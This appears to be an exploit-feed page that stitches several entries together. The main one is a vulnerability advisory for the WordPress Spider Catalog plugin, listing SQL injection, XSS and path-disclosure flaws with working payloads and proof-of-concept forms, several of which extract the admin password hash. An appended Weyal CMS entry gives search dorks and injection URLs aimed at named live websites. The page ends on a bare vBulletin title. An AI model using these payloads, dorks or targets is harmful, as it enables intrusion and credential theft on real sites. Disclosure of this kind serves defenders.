Author: Janek Vind "waraxe"
Date: 22. May 2013
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-105.html
Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Spider Catalog is the best WordPress catalog plugin. It is a convenient tool
for organizing the products represented on your website into catalogs. Each
product on the catalog is assigned with a relevant category, which makes it
easier for the customers to search and identify the needed products within the
catalog.
http://wordpress.org/extend/plugins/catalog/
http://web-dorado.com/products/wordpress-catalog.html
Vulnerable is current version 1.4.6, older versions not tested.
###############################################################################
1. SQL Injection in Spider Catalog Shortcodes
###############################################################################
Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied shortcode parameter "id"
Preconditions:
1. must be logged in as user with posting privileges (Author level
required as minimum by default)
Php script "catalog.php" line 101:
------------------------[ source code start ]----------------------------------
add_shortcode('Spider_Catalog_Category', 'Spider_Catalog_Products_list_shotrcode');
function Spider_Catalog_Single_product_shotrcode($atts) {
extract(shortcode_atts(array(
'id' => '',
), $atts));
return spider_cat_Single_product($id);
}
add_shortcode('Spider_Catalog_Product', 'Spider_Catalog_Single_product_shotrcode');
..
function spider_cat_Single_product($id)
{
..
return front_end_single_product($id);
------------------------[ source code end ]------------------------------------
We can see, that two shortcodes are defined: "Spider_Catalog_Category" and
"Spider_Catalog_Product". Both of them have SQL Injection vulnerability via
shortcode parameter "id".
Let's analyze shortcode "Spider_Catalog_Product" implementation.
Parameter "id" from shortcode "Spider_Catalog_Product" will be used in function
"front_end_single_product()" as argument.
Php script "front_end_functions.php" line 18:
------------------------[ source code start ]----------------------------------
function front_end_single_product($id)
{
..
$product_id=$id;
..
$query = "SELECT ".$wpdb->prefix."spidercatalog_products.*,
".$wpdb->prefix."spidercatalog_product_categories.name as cat_name FROM
".$wpdb->prefix."spidercatalog_products left join
".$wpdb->prefix."spidercatalog_product_categories on
".$wpdb->prefix."spidercatalog_products.category_id=
".$wpdb->prefix."spidercatalog_product_categories.id where
".$wpdb->prefix."spidercatalog_products.id='".$product_id."' and
".$wpdb->prefix."spidercatalog_products.published = '1' ";
$rows = $wpdb->get_results($query);
------------------------[ source code end ]------------------------------------
As seen above, parameter "id" is used in SQL query without any sanitization,
which leads to SQL Injection vulnerability.
Tests:
Log in as user with posting privileges and use shortcode as below:
[Spider_Catalog_Product id="0' UNION SELECT 1,2,3,@@version,5,6,7,8,9,10,11,12#"]
Now open webpage containing specific post and MySQL version info will be revealed.
Second test:
[Spider_Catalog_Product id="0' UNION SELECT 1,2,3,(SELECT CONCAT_WS(0x3a,user_login,user_pass)FROM wp_users WHERE
ID=1),5,6,7,8,9,10,11,12#"]
As result, sensitive information (username and hashed password) will be revealed
for WordPress user with ID 1 (usually admin).
SQL Injection in other shortcode can be exploited in similar way:
[Spider_Catalog_Category id="0 UNION SELECT 1,2,@@version,4,5,6,7,8#"]
.. and we can see MySQL version info (look at the html source code):
<a style="cursor:pointer;" onclick="catt_idd_1(5.5.30)" >Back to Catalog
###############################################################################
2. SQL Injection in "catalog.php" function "catalog_after_search_results()"
###############################################################################
Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied parameter "s"
Preconditions: none
Php script "catalog.php" line 39:
------------------------[ source code start ]----------------------------------
function catalog_after_search_results($query){
global $wpdb;
if(isset($_REQUEST['s']) && $_REQUEST['s']){
$serch_word=htmlspecialchars(stripslashes($_REQUEST['s']));
$query=str_replace($wpdb->prefix."posts.post_content",
gen_string_catalog_search($serch_word,$wpdb->prefix.'posts.post_content')
." ".$wpdb->prefix."posts.post_content",$query);
}
return $query;
}
add_filter( 'posts_request', 'catalog_after_search_results');
------------------------[ source code end ]------------------------------------
User-submitted parameter "s" is prepared with functions "stripslashes" and
"htmlspecialchars" and then used in SQL query in WordPress seach functionality.
Stripping slashes from parameter "s" nullifies "magic_quotes_gpc" effect and
"htmlspecialchars" is suppose to be used for sanitization. Still, it is known,
that "htmlspecialchars" function by default does not modify single quotes,
which leads to SQL Injection vulnerability.
Specific SQL Injection can be exploited using "Nested SQL Injection" method.
Tests:
first we need to make sure, that WordPress will show SQL errors.
Let's open the file "wp-includes/wp-db.php" and change the line
var $show_errors = false;
to the line below:
var $show_errors = true;
Then let's issue GET request:
http://localhost/wp351/?s=war'axe
As result SQL errors will be shown on webpage:
WordPress database error: [You have an error in your SQL syntax; check the manual
that corresponds to your MySQL server version for the right syntax to use near 'axe%')
OR (name LIKE '%war'axe%')' at line 1]
SELECT * FROM wp_spidercatalog_product_categories WHERE
(description LIKE '%war'axe%') OR (name LIKE '%war'axe%')
This confirms SQL Injection existence. Now let's try exploitation, which can be
done using either GET or POST method. PoC code below uses POST method.
<html><body><center>
<form action="http://localhost/wp351/"; method="post">
<input type="hidden" name="s" value="')UNION SELECT CONCAT(0x27,')))UNION SELECT 1,1,1,1,1,(SELECT
CONCAT_WS(0x3a,user_login,user_pass)FROM wp_users WHERE ID=1),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1',0x23),1,1,1,1,1,1,1#">
<input type="submit" value="Test">
</form>
</center></body></html>
After clicking "Test" button POST request will be made and resulting web page
reveals username and password hash for WordPress user with ID 1.
###############################################################################
3. SQL Injection in "Categories.php" function "change_cat()"
###############################################################################
Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied GET parameter "id"
Preconditions:
1. must be logged in as WordPress admin
Php script "Categories.php" line 491:
------------------------[ source code start ]----------------------------------
function change_cat( $id ){
global $wpdb;
$published=$wpdb->get_var("SELECT published FROM
".$wpdb->prefix."spidercatalog_product_categories WHERE `id`=".$id );
------------------------[ source code end ]------------------------------------
Tests:
first we need to make sure, that WordPress will show SQL errors.
Let's open the file "wp-includes/wp-db.php" and change the line
var $show_errors = false;
to the line below:
var $show_errors = true;
Now log in as WordPress admin and then issue GET request as below:
http://localhost/wp351/wp-admin/admin.php?page=Categories_Spider_Catalog&task=publish_cat&id=waraxe
As result SQL errors will be shown on webpage:
WordPress database error: [Unknown column 'waraxe' in 'where clause']
SELECT published FROM wp_spidercatalog_product_categories WHERE `id`=waraxe
This confirms SQL Injection existence.
###############################################################################
4. SQL Injection in "Categories.php" function "editCategory()"
###############################################################################
Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied GET parameter "id"
Preconditions:
1. must be logged in as WordPress admin
Php script "Categories.php" line 338:
------------------------[ source code start ]----------------------------------
function editCategory($id)
{
..
$query="SELECT * FROM ".$wpdb->prefix."spidercatalog_product_categories
WHERE id='".$id."'";
$row=$wpdb->get_row($query);
------------------------[ source code end ]------------------------------------
Tests:
first we need to make sure, that WordPress will show SQL errors.
Let's open the file "wp-includes/wp-db.php" and change the line
var $show_errors = false;
to the line below:
var $show_errors = true;
Now log in as WordPress admin and then issue GET request as below:
http://localhost/wp351/wp-admin/admin.php?page=Categories_Spider_Catalog&task=edit_cat&id=waraxe
As result SQL errors will be shown on webpage:
WordPress database error: [Unknown column 'waraxe' in 'where clause']
SELECT * FROM wp_spidercatalog_product_categories WHERE id!=waraxe and parent=0
This confirms SQL Injection existence.
###############################################################################
5. SQL Injection in "Categories.php" function "apply_cat()"
###############################################################################
Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied GET parameter "id"
Preconditions:
1. must be logged in as WordPress admin
Php script "Categories.php" line 570:
------------------------[ source code start ]----------------------------------
function apply_cat($id)
{
..
$cat_row=$wpdb->get_results("SELECT * FROM
".$wpdb->prefix."spidercatalog_product_categories
WHERE id!=" .$_GET['id']. " ");
------------------------[ source code end ]------------------------------------
Tests:
first we need to make sure, that WordPress will show SQL errors.
Let's open the file "wp-includes/wp-db.php" and change the line
var $show_errors = false;
to the line below:
var $show_errors = true;
Now log in as WordPress admin and then issue GET request as below:
http://localhost/wp351/wp-admin/admin.php?page=Categories_Spider_Catalog&task=save&id=waraxe
As result SQL errors will be shown on webpage:
WordPress database error: [Unknown column 'waraxe' in 'where clause']
SELECT * FROM wp_spidercatalog_product_categories WHERE id!=waraxe
This confirms SQL Injection existence.
###############################################################################
6. SQL Injection in "Categories.php" function "removeCategory()"
###############################################################################
Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied GET parameter "id"
Preconditions:
1. must be logged in as WordPress admin
Php script "Categories.php" line 519:
------------------------[ source code start ]----------------------------------
function removeCategory($id)
{
..
$sql_remov_tag="DELETE FROM ".$wpdb->prefix."spidercatalog_product_categories
WHERE id='".$id."'";
if(!$wpdb->query($sql_remov_tag))
------------------------[ source code end ]------------------------------------
Tests:
first we need to make sure, that WordPress will show SQL errors.
Let's open the file "wp-includes/wp-db.php" and change the line
var $show_errors = false;
to the line below:
var $show_errors = true;
Now log in as WordPress admin and then issue GET request as below:
http://localhost/wp351/wp-admin/admin.php?page=Categories_Spider_Catalog&task=remove_cat&id=waraxe
As result SQL errors will be shown on webpage:
WordPress database error: [Unknown column 'waraxe' in 'where clause']
UPDATE wp_spidercatalog_product_categories SET parent="0" WHERE parent=waraxe
This confirms SQL Injection existence.
###############################################################################
7. SQL Injection in "products.php" function "update_prad_cat()"
###############################################################################
Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied POST parameter "ordering"
Preconditions:
1. must be logged in as WordPress admin
Php script "products.php" line 364:
------------------------[ source code start ]----------------------------------
function update_prad_cat($id){
..
$corent_ord=$wpdb->get_var('SELECT `ordering`
FROM '.$wpdb->prefix.'spidercatalog_products WHERE id=\''.$id.'\'');
..
if($corent_ord>$_POST["ordering"])
{
$rows=$wpdb->get_results('SELECT * FROM '.$wpdb->prefix.'spidercatalog_products
WHERE ordering>='.$_POST["ordering"].' AND id<>\''.$id.'\' ORDER BY `ordering` ASC ');
------------------------[ source code end ]------------------------------------
Test:
first we need to make sure, that WordPress will show SQL errors.
Let's open the file "wp-includes/wp-db.php" and change the line
var $show_errors = false;
to the line below:
var $show_errors = true;
Now let's use html form below for testing:
<html><body><center>
<form action="http://localhost/wp351/wp-admin/admin.php?page=Products_Spider_Catalog&task=apply&id=0"; method="post">
<input type="hidden" name="ordering" value="waraxe">
<input type="submit" value="Test">
</form>
</center></body></html>
After pushing "Test" button SQL error will be shown on resulting webpage:
WordPress database error: [Unknown column 'waraxe' in 'where clause']
SELECT * FROM wp_spidercatalog_products WHERE ordering>=waraxe ORDER BY `ordering` ASC
This confirms SQL Injection existence.
###############################################################################
8. SQL Injection in "products.php" function "change_prod()"
###############################################################################
Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied GET parameter "id"
Preconditions:
1. must be logged in as WordPress admin
Php script "products.php" line 245:
------------------------[ source code start ]----------------------------------
function change_prod( $id ){
..
$published=$wpdb->get_var("SELECT published
FROM ".$wpdb->prefix."spidercatalog_products WHERE `id`=".$id );
------------------------[ source code end ]------------------------------------
Test:
first we need to make sure, that WordPress will show SQL errors.
Let's open the file "wp-includes/wp-db.php" and change the line
var $show_errors = false;
to the line below:
var $show_errors = true;
Now log in as WordPress admin and then issue GET request as below:
http://localhost/wp351/wp-admin/admin.php?page=Products_Spider_Catalog&task=unpublish_prad&id=waraxe
As result SQL errors will be shown on webpage:
WordPress database error: [Unknown column 'waraxe' in 'where clause']
SELECT published FROM wp_spidercatalog_products WHERE `id`=waraxe
This confirms SQL Injection existence.
###############################################################################
9. SQL Injection in "products.php" function "spider_cat_prod_rev()"
###############################################################################
Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied POST parameter "order_by"
Preconditions:
1. must be logged in as WordPress admin
Php script "products.php" line 745:
------------------------[ source code start ]----------------------------------
function spider_cat_prod_rev($id)
{
..
if(isset($_POST['page_number']))
{
if($_POST['asc_or_desc'])
{
$sort["sortid_by"]=$_POST['order_by'];
..
$order="ORDER BY ".$sort["sortid_by"]." ASC";
..
$query = "SELECT * FROM ".$wpdb->prefix."spidercatalog_product_reviews".
$where." ". $order." "." LIMIT ".$limit.",20";
$rows = $wpdb->get_results($query);
------------------------[ source code end ]------------------------------------
Test:
first we need to make sure, that WordPress will show SQL errors.
Let's open the file "wp-includes/wp-db.php" and change the line
var $show_errors = false;
to the line below:
var $show_errors = true;
Now let's use html form below for testing:
<html><body><center>
<form action="http://localhost/wp351/wp-admin/admin.php?page=Products_Spider_Catalog&task=edit_reviews&id=0";
method="post">
<input type="hidden" name="order_by" value="waraxe">
<input type="hidden" name="page_number" value="1">
<input type="hidden" name="asc_or_desc" value="1">
<input type="submit" value="Test">
</form>
</center></body></html>
After pushing "Test" button SQL error will be shown on resulting webpage:
WordPress database error: [Unknown column 'waraxe' in 'order clause']
SELECT * FROM wp_spidercatalog_product_reviews WHERE product_id='0' ORDER BY waraxe ASC LIMIT 0,20
This confirms SQL Injection existence.
###############################################################################
10. SQL Injection in "products.php" function "delete_rev()"
###############################################################################
Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied POST parameter "post"
Preconditions:
1. must be logged in as WordPress admin
Php script "products.php" line 817:
------------------------[ source code start ]----------------------------------
function delete_rev($id){
.
$cid = $_POST['post'];
..
$cids = implode(',', $cid);
$query = "DELETE FROM ".$wpdb->prefix."spidercatalog_product_reviews
WHERE id IN ( ".$cids." )";
if(!$wpdb->query($query))
------------------------[ source code end ]------------------------------------
Test:
first we need to make sure, that WordPress will show SQL errors.
Let's open the file "wp-includes/wp-db.php" and change the line
var $show_errors = false;
to the line below:
var $show_errors = true;
Now let's use html form below for testing:
<html><body><center>
<form action="http://localhost/wp351/wp-admin/admin.php?page=Products_Spider_Catalog&task=delete_reviews"; method="post">
<input type="hidden" name="post[]" value="waraxe">
<input type="submit" value="Test">
</form>
</center></body></html>
After pushing "Test" button SQL error will be shown on resulting webpage:
WordPress database error: [Unknown column 'waraxe' in 'where clause']
DELETE FROM wp_spidercatalog_product_reviews WHERE id IN ( waraxe )
This confirms SQL Injection existence.
###############################################################################
11. SQL Injection in "products.php" function "delete_single_review()"
###############################################################################
Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied GET parameter "del_id"
Preconditions:
1. must be logged in as WordPress admin
Php script "products.php" line 854:
------------------------[ source code start ]----------------------------------
function delete_single_review($id)
{
..
$del_id=$_GET['del_id'];
$query = "DELETE FROM ".$wpdb->prefix."spidercatalog_product_reviews
WHERE id=".$del_id;
if(!$wpdb->query($query))
------------------------[ source code end ]------------------------------------
Test:
first we need to make sure, that WordPress will show SQL errors.
Let's open the file "wp-includes/wp-db.php" and change the line
var $show_errors = false;
to the line below:
var $show_errors = true;
Now log in as WordPress admin and then issue GET request as below:
http://localhost/wp351/wp-admin/admin.php?page=Products_Spider_Catalog&task=delete_review&del_id=waraxe
As result SQL errors will be shown on webpage:
WordPress database error: [Unknown column 'waraxe' in 'where clause']
DELETE FROM wp_spidercatalog_product_reviews WHERE id=waraxe
This confirms SQL Injection existence.
###############################################################################
12. SQL Injection in "products.php" function "spider_cat_prod_rating()"
###############################################################################
Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied POST parameter "order_by"
Preconditions:
1. must be logged in as WordPress admin
Php script "products.php" line 940:
------------------------[ source code start ]----------------------------------
function spider_cat_prod_rating($id)
{
..
if(isset($_POST['page_number']))
{
if($_POST['asc_or_desc'])
{
$sort["sortid_by"]=$_POST['order_by'];
..
$order="ORDER BY ".$sort["sortid_by"]." ASC";
..
$query = "SELECT * FROM ".$wpdb->prefix."spidercatalog_product_votes"
.$where." ". $order." "." LIMIT ".$limit.",20";
$rows = $wpdb->get_results($query);
------------------------[ source code end ]------------------------------------
Test:
first we need to make sure, that WordPress will show SQL errors.
Let's open the file "wp-includes/wp-db.php" and change the line
var $show_errors = false;
to the line below:
var $show_errors = true;
Now let's use html form below for testing:
<html><body><center>
<form action="http://localhost/wp351/wp-admin/admin.php?page=Products_Spider_Catalog&task=edit_rating&id=0";
method="post">
<input type="hidden" name="order_by" value="waraxe">
<input type="hidden" name="page_number" value="1">
<input type="hidden" name="asc_or_desc" value="1">
<input type="submit" value="Test">
</form>
</center></body></html>
After pushing "Test" button SQL error will be shown on resulting webpage:
WordPress database error: [Unknown column 'waraxe' in 'order clause']
SELECT * FROM wp_spidercatalog_product_votes WHERE product_id='0' ORDER BY waraxe ASC LIMIT 0,20
This confirms SQL Injection existence.
###############################################################################
13. SQL Injection in "products.php" function "delete_ratings()"
###############################################################################
Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied POST parameter "post"
Preconditions:
1. must be logged in as WordPress admin
Php script "products.php" line 1014:
------------------------[ source code start ]----------------------------------
function delete_ratings($id){
..
$cid = $_POST['post'];
..
$cids = implode(',', $cid);
$query = "DELETE FROM ".$wpdb->prefix."spidercatalog_product_votes
WHERE id IN ( ".$cids." )";
if(!$wpdb->query($query))
------------------------[ source code end ]------------------------------------
Test:
first we need to make sure, that WordPress will show SQL errors.
Let's open the file "wp-includes/wp-db.php" and change the line
var $show_errors = false;
to the line below:
var $show_errors = true;
Now let's use html form below for testing:
<html><body><center>
<form action="http://localhost/wp351/wp-admin/admin.php?page=Products_Spider_Catalog&task=delete_ratings"; method="post">
<input type="hidden" name="post[]" value="waraxe">
<input type="submit" value="Test">
</form>
</center></body></html>
After pushing "Test" button SQL error will be shown on resulting webpage:
WordPress database error: [Unknown column 'waraxe' in 'where clause']
DELETE FROM wp_spidercatalog_product_votes WHERE id IN ( waraxe )
This confirms SQL Injection existence.
###############################################################################
14. SQL Injection in "products.php" function "delete_single_rating()"
###############################################################################
Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied GET parameter "del_id"
Preconditions:
1. must be logged in as WordPress admin
Php script "products.php" line 1051:
------------------------[ source code start ]----------------------------------
function delete_single_rating($id)
{
..
$del_id=$_GET['del_id'];
$query = "DELETE FROM ".$wpdb->prefix."spidercatalog_product_votes
WHERE id=".$del_id;
if(!$wpdb->query($query))
------------------------[ source code end ]------------------------------------
Test:
first we need to make sure, that WordPress will show SQL errors.
Let's open the file "wp-includes/wp-db.php" and change the line
var $show_errors = false;
to the line below:
var $show_errors = true;
Now log in as WordPress admin and then issue GET request as below:
http://localhost/wp351/wp-admin/admin.php?page=Products_Spider_Catalog&task=delete_rating&del_id=waraxe
As result SQL errors will be shown on webpage:
WordPress database error: [Unknown column 'waraxe' in 'where clause']
DELETE FROM wp_spidercatalog_product_votes WHERE id=waraxe
This confirms SQL Injection existence.
###############################################################################
15. SQL Injection in "products.php" function "update_s_c_rating()"
###############################################################################
Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied GET parameter "id"
Preconditions:
1. must be logged in as WordPress admin
Php script "products.php" line 1086:
------------------------[ source code start ]----------------------------------
function update_s_c_rating($id){
..
$rows=$wpdb->get_col("SELECT `id` FROM
".$wpdb->prefix."spidercatalog_product_votes WHERE product_id=".$id);
------------------------[ source code end ]------------------------------------
Test:
first we need to make sure, that WordPress will show SQL errors.
Let's open the file "wp-includes/wp-db.php" and change the line
var $show_errors = false;
to the line below:
var $show_errors = true;
Now log in as WordPress admin and then issue GET request as below:
http://localhost/wp351/wp-admin/admin.php?page=Products_Spider_Catalog&task=s_p_apply_rating&id=waraxe
As result SQL errors will be shown on webpage:
WordPress database error: [Unknown column 'waraxe' in 'where clause']
SELECT `id` FROM wp_spidercatalog_product_votes WHERE product_id=waraxe
This confirms SQL Injection existence.
###############################################################################
16. Stored XSS in Spider Catalog category name
###############################################################################
Reason:
1. insufficient sanitization of html output
Preconditions:
1. must be logged in as user with "manage_options" privileges (admin by default)
Test:
1. Add or edit Spider Catalog category entry and set name for category as following:
test<script>alert(123);</script>
2. View added/edited category:
http://localhost/wp351/wp-admin/admin.php?page=Categories_Spider_Catalog&task=edit_cat&id=2
Result: javascript alert box pops up, confirming Stored XSS vulnerability.
###############################################################################
17. Stored XSS in Spider Catalog product name
###############################################################################
Reason:
1. insufficient sanitization of html output
Preconditions:
1. must be logged in as user with "manage_options" privileges (admin by default)
Test:
1. Add or edit Spider Catalog product entry and set name for product as following:
test<script>alert(123);</script>
2. View added/edited product:
http://localhost/wp351/wp-admin/admin.php?page=Products_Spider_Catalog&task=edit_prad&id=5
Result: javascript alert box pops up, confirming Stored XSS vulnerability.
###############################################################################
18. Reflected XSS in "Categories.html.php"
###############################################################################
Reason:
1. insufficient sanitization of html output
Attack vectors:
1. user-supplied POST parameters "search_events_by_title", "asc_or_desc" and
"order_by"
Preconditions:
1. logged in as user with "manage_options" privileges (admin by default)
Php script "Categories.html.php" line 90:
------------------------[ source code start ]----------------------------------
if(isset($_POST['serch_or_not'])) {if($_POST['serch_or_not']=="search"){
$serch_value=$_POST['search_events_by_title']; }else{$serch_value="";}}
..
<input type="text" name="search_events_by_title" value="'.$serch_value.'"
..
<input type="hidden" name="asc_or_desc" id="asc_or_desc"
value="<?php if(isset($_POST['asc_or_desc'])) echo $_POST['asc_or_desc'];?>" />
<input type="hidden" name="order_by" id="order_by"
value="<?php if(isset($_POST['order_by'])) echo $_POST['order_by'];?>" />
------------------------[ source code end ]------------------------------------
Test:
<html><body><center>
<form action="http://localhost/wp351/wp-admin/admin.php?page=Categories_Spider_Catalog"; method="post">
<input type="hidden" name="serch_or_not" value="search">
<input type="hidden" name="search_events_by_title" value='"><script>alert(111);</script>'>
<input type="hidden" name="asc_or_desc" value='"><script>alert(222);</script>'>
<input type="hidden" name="order_by" value='"><script>alert(333);</script>'>
<input type="submit" value="Test">
</form>
</center></body></html>
Result: javascript alert boxes pop up, confirming Reflected XSS vulnerabilities.
###############################################################################
19. Reflected XSS in "Products.html.php"
###############################################################################
Reason:
1. insufficient sanitization of html output
Attack vectors:
1. user-supplied POST parameters "search_events_by_title", "asc_or_desc" and
"order_by"
Preconditions:
1. logged in as user with "manage_options" privileges (admin by default)
Php script "Products.html.php" line 91:
------------------------[ source code start ]----------------------------------
if(isset($_POST['serch_or_not'])) {if($_POST['serch_or_not']=="search"){
$serch_value=$_POST['search_events_by_title']; }else{$serch_value="";}}
..
<input type="text" name="search_events_by_title" value="'.$serch_value.'"
..
<input type="hidden" name="asc_or_desc" id="asc_or_desc"
value="<?php if(isset($_POST['asc_or_desc'])) echo $_POST['asc_or_desc'];?>" />
<input type="hidden" name="order_by" id="order_by"
value="<?php if(isset($_POST['order_by'])) echo $_POST['order_by'];?>" />
------------------------[ source code end ]------------------------------------
Test:
<html><body><center>
<form action="http://localhost/wp351/wp-admin/admin.php?page=Products_Spider_Catalog"; method="post">
<input type="hidden" name="serch_or_not" value="search">
<input type="hidden" name="search_events_by_title" value='"><script>alert(111);</script>'>
<input type="hidden" name="asc_or_desc" value='"><script>alert(222);</script>'>
<input type="hidden" name="order_by" value='"><script>alert(333);</script>'>
<input type="submit" value="Test">
</form>
</center></body></html>
Result: javascript alert boxes pop up, confirming Reflected XSS vulnerabilities.
###############################################################################
20. Reflected XSS in "spiderBox/spiderBox.js.php"
###############################################################################
Reason:
1. insufficient sanitization of html output
Attack vectors:
1. user-supplied GET parameters "delay","slideShowQ","allImagesQ", "spiderShop",
"darkBG","juriroot"
Preconditions:
1. PHP setting "register_globals=1"
Php script "spiderBox.js.php" line 243:
------------------------[ source code start ]----------------------------------
slideShowDelay=<?php echo $_GET['delay']; ?>;
slideShowQ=<?php echo $_GET['slideShowQ']; ?>;
allImagesQ=<?php echo $_GET['allImagesQ']; ?>;
spiderShop=<?php echo isset($_GET['spiderShop'])?$_GET['spiderShop']:0; ?>;
darkBG=<?php echo $_GET['darkBG']; ?>;
keyOfOpenImage=-1;
spiderBoxBase="<?php echo urldecode($_GET['juriroot']); ?>/spiderBox/";
------------------------[ source code end ]------------------------------------
Tests:
http://localhost/wp351/wp-content/plugins/catalog/spiderBox/spiderBox.js.php?delay=</script><script>alert(123);</script>
http://localhost/wp351/wp-content/plugins/catalog/spiderBox/spiderBox.js.php?slideShowQ=</script><script>alert(123);</script>
http://localhost/wp351/wp-content/plugins/catalog/spiderBox/spiderBox.js.php?allImagesQ=</script><script>alert(123);</script>
http://localhost/wp351/wp-content/plugins/catalog/spiderBox/spiderBox.js.php?spiderShop=</script><script>alert(123);</script>
http://localhost/wp351/wp-content/plugins/catalog/spiderBox/spiderBox.js.php?darkBG=</script><script>alert(123);</script>
http://localhost/wp351/wp-content/plugins/catalog/spiderBox/spiderBox.js.php?juriroot=</script><script>alert(123);</script>
Result: javascript alert boxes pop up, confirming Reflected XSS vulnerabilities.
By the way, GET parameter "juriroot" allows us to use double url encoding,
which bypasses IE Anti-XSS filter:
http://localhost/wp351/wp-content/plugins/catalog/spiderBox/spiderBox.js.php?juriroot=%253C%252Fscript%253E%253Cscript%253Ealert%2528123%2529%253B%253C%252Fscript%253E
###############################################################################
21. Reflected XSS in "catalog.php" function "spider_box_js_php()"
###############################################################################
Reason:
1. insufficient sanitization of html output
Attack vectors:
1. user-supplied GET parameters "delay","slideShowQ","allImagesQ", "spiderShop",
"darkBG","juriroot"
Preconditions: none
Php script "catalog.php" line 1026:
------------------------[ source code start ]----------------------------------
add_action('wp_ajax_spiderboxjsphp', 'spider_box_js_php');
add_action('wp_ajax_nopriv_spiderboxjsphp', 'spider_box_js_php');
function spider_box_js_php(){
..
slideShowDelay=<?php echo $_GET['delay']; ?>;
slideShowQ=<?php echo $_GET['slideShowQ']; ?>;
allImagesQ=<?php echo $_GET['allImagesQ']; ?>;
spiderShop=<?php echo isset($_GET['spiderShop'])?$_GET['spiderShop']:0; ?>;
darkBG=<?php echo $_GET['darkBG']; ?>;
keyOfOpenImage=-1;
spiderBoxBase="<?php echo urldecode($_GET['juriroot']); ?>/spiderBox/";
------------------------[ source code end ]------------------------------------
Tests:
http://localhost/wp351/wp-admin/admin-ajax.php?action=spiderboxjsphp&delay=</script><script>alert(123);</script>
http://localhost/wp351/wp-admin/admin-ajax.php?action=spiderboxjsphp&slideShowQ=</script><script>alert(123);</script>
http://localhost/wp351/wp-admin/admin-ajax.php?action=spiderboxjsphp&allImagesQ=</script><script>alert(123);</script>
http://localhost/wp351/wp-admin/admin-ajax.php?action=spiderboxjsphp&spiderShop=</script><script>alert(123);</script>
http://localhost/wp351/wp-admin/admin-ajax.php?action=spiderboxjsphp&darkBG=</script><script>alert(123);</script>
http://localhost/wp351/wp-admin/admin-ajax.php?action=spiderboxjsphp&juriroot=</script><script>alert(123);</script>
Result: javascript alert boxes pop up, confirming Reflected XSS vulnerabilities.
By the way, GET parameter "juriroot" allows us to use double url encoding,
which bypasses IE Anti-XSS filter:
http://localhost/wp351/wp-content/plugins/catalog/spiderBox/spiderBox.js.php?juriroot=%253C%252Fscript%253E%253Cscript%253Ealert%2528123%2529%253B%253C%252Fscript%253E
###############################################################################
22. Full Path Disclosure in multiple scripts
###############################################################################
Preconditions:
1. PHP setting "display_errors = On"
Tests:
http://localhost/wp351/wp-content/plugins/catalog/Categories.html.php
Fatal error: Call to undefined function current_user_can() in
C:\apache_www\wp351\wp-content\plugins\catalog\Categories.html.php on line 3
http://localhost/wp351/wp-content/plugins/catalog/Categories.php
Fatal error: Call to undefined function current_user_can() in
C:\apache_www\wp351\wp-content\plugins\catalog\Categories.php on line 3
http://localhost/wp351/wp-content/plugins/catalog/Products.html.php
Fatal error: Call to undefined function current_user_can() in
C:\apache_www\wp351\wp-content\plugins\catalog\Products.html.php on line 3
http://localhost/wp351/wp-content/plugins/catalog/catalog.php
Fatal error: Call to undefined function add_action() in
C:\apache_www\wp351\wp-content\plugins\catalog\catalog.php on line 11
http://localhost/wp351/wp-content/plugins/catalog/catalog_Options.html.php
Fatal error: Call to undefined function current_user_can()
in C:\apache_www\wp351\wp-content\plugins\catalog\catalog_Options.html.php on line 3
http://localhost/wp351/wp-content/plugins/catalog/catalog_Options.php
Fatal error: Call to undefined function current_user_can() in
C:\apache_www\wp351\wp-content\plugins\catalog\catalog_Options.php on line 3
http://localhost/wp351/wp-content/plugins/catalog/products.php
Fatal error: Call to undefined function current_user_can() in
C:\apache_www\wp351\wp-content\plugins\catalog\products.php on line 3
http://localhost/wp351/?s[]
Warning: stripslashes() expects parameter 1 to be string, array given in
C:\apache_www\wp351\wp-content\plugins\catalog\catalog.php on line 42
Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
come2waraxe () yahoo com
Janek Vind "waraxe"
Waraxe forum: http://www.waraxe.us/forums.html
Personal homepage: http://www.janekvind.com/
Random project: http://albumnow.com/
|
↧
WordPress Spider Catalog Multiple Vulnerabilities
↧
Weyal CMS SQL Injection
================================================
[-] Name: Weyal Cms SQL Injection Vulnerability
[-] Vendor: N/A
[-] Date: 2013-05-22
[-] Author: XroGuE
[-] Home: http://Att4ck3r.ir
================================================
[+] Dork: intext:"Designed by Rohi.af"
intext:"Designed by Dr. Weyal"
================================================
[+] Vulnerable Page: fullstory.php?id= , countrys.php?countryid= , "check Another pages
|
"
[+] Vuln: www.[site].com/[path]/fullstory.php?id=SQLi
www.[site].com/[path]/countrys.php?id=SQLi
[+] Demo: http://mysurgery.ru/fullstory.php?id=-999 union all select 1,2,version(),user(),database(),6
[+] Demo: http://www.s-rohi.com/fullstory.php?id=-999 UNION SELECT 1,2,version(),database(),5,6,7,8,9,10,11,12,13,14
[+] Demo: http://www.vegos.ru/countrys.php?countryid=-999 union all select 1,version(),database()
================================================↧
↧
vBulletin 5b SQL Injection
